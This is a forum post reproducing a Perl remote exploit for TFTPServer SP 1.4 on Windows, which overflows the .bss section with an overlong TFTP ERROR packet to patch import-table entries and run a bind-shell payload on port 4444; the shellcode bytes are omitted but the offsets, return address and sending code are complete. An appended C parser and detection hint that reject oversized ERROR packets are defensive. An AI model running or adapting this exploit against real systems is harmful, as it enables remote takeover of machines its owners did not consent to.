 TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit

El-Fuego



Number of posts : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

Post subject: TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit   Thu Jun 12, 2008 8:17 pm

#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respect the RFC 1350 for Error packets, lot of other
# TFTP Servers don't respect it.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit will overwrite all the .bss section and some portion of the .idata section
# to patch functions addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.

use strict;
use IO::Socket::INET;

my $target = shift || die "Usage: $0 \n : type of the program\n".
    "\t for a TFTP service\n\t for a TFTP simple program\n";
my $type = defined $ARGV[0] ? shift : 's';

my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"";    # 500-byte encoded payload omitted

my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section

if ($type =~ /p/i) {
    # "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360
    # ---------------------------------------------------------------------------
    # 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
    # ---------------------------------------------------------------------------
    print STDOUT "Exploiting TFTPServer RunStandAlone program\n";
    $buffer = "\x90" x 19907 . $shellcode . $RET;
}
else {
    # "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390
    # ------------------------------------------------------------------------
    # 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
    # ------------------------------------------------------------------------
    print STDOUT "Exploiting TFTPServer Service program\n";
    $buffer = "\x90" x 19955 . $shellcode . $RET;
}

my $sock = IO::Socket::INET->new(
    PeerAddr => $target,
    PeerPort => 69,
    Proto    => 'udp'
) or die "error: $!\n";

$sock->send("\x00\x05" . $buffer, 0);
print STDOUT "done.\n";
exit 0;
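A defensive counterpart to the overlong TFTP Error packet described in the post, as an added example that is not part of the original post or of the TFTP server project: a bounded parser for ERROR packets using the RFC 1350 layout (opcode, error code, message, NUL) that rejects oversized datagrams before copying anything. The names `parse_tftp_error`, `struct tftp_error` and the 128-byte `ERRMSG_MAX` limit are assumptions chosen here.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TFTP_OP_ERROR   5
#define TFTP_MAX_PACKET 516   /* RFC 1350: 4-byte header + 512 data bytes */
#define ERRMSG_MAX      128   /* assumed local limit for a stored message */

enum parse_status { PARSE_OK, PARSE_NOT_ERROR, PARSE_TOO_SHORT,
                    PARSE_TOO_LONG, PARSE_UNTERMINATED };

struct tftp_error {
    uint16_t code;
    char     msg[ERRMSG_MAX];   /* NUL-terminated on PARSE_OK */
    int      truncated;         /* 1 if the message was cut to fit msg[] */
};

/* Validate a received UDP payload as a TFTP ERROR packet; never copies past msg[]. */
enum parse_status parse_tftp_error(const uint8_t *pkt, size_t len,
                                   struct tftp_error *out)
{
    if (len < 2) return PARSE_TOO_SHORT;
    if (((pkt[0] << 8) | pkt[1]) != TFTP_OP_ERROR) return PARSE_NOT_ERROR;
    if (len > TFTP_MAX_PACKET) return PARSE_TOO_LONG;   /* reject before any copy */
    if (len < 5) return PARSE_TOO_SHORT;                /* opcode + code + NUL */

    const uint8_t *msg = pkt + 4;
    const uint8_t *nul = memchr(msg, 0, len - 4);       /* search inside the datagram only */
    if (nul == NULL) return PARSE_UNTERMINATED;

    size_t n = (size_t)(nul - msg);
    out->truncated = n >= ERRMSG_MAX;
    if (out->truncated) n = ERRMSG_MAX - 1;
    memcpy(out->msg, msg, n);
    out->msg[n] = '\0';
    out->code = (uint16_t)((pkt[2] << 8) | pkt[3]);
    return PARSE_OK;
}

int main(void)
{
    /* Constructed inputs: a normal ERROR packet and a datagram sized like the one in the post. */
    static const uint8_t ok[] = {0, 5, 0, 1, 'n', 'o', ' ', 'f', 'i', 'l', 'e', 0};
    static uint8_t big[20461] = {0, 5};
    struct tftp_error e;
    return !(parse_tftp_error(ok, sizeof ok, &e) == PARSE_OK &&
             parse_tftp_error(big, sizeof big, &e) == PARSE_TOO_LONG);
}
```

For detection, a UDP port 69 datagram with opcode 5 that exceeds 516 bytes is already outside RFC 1350 and is worth alerting on regardless of the server in use.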
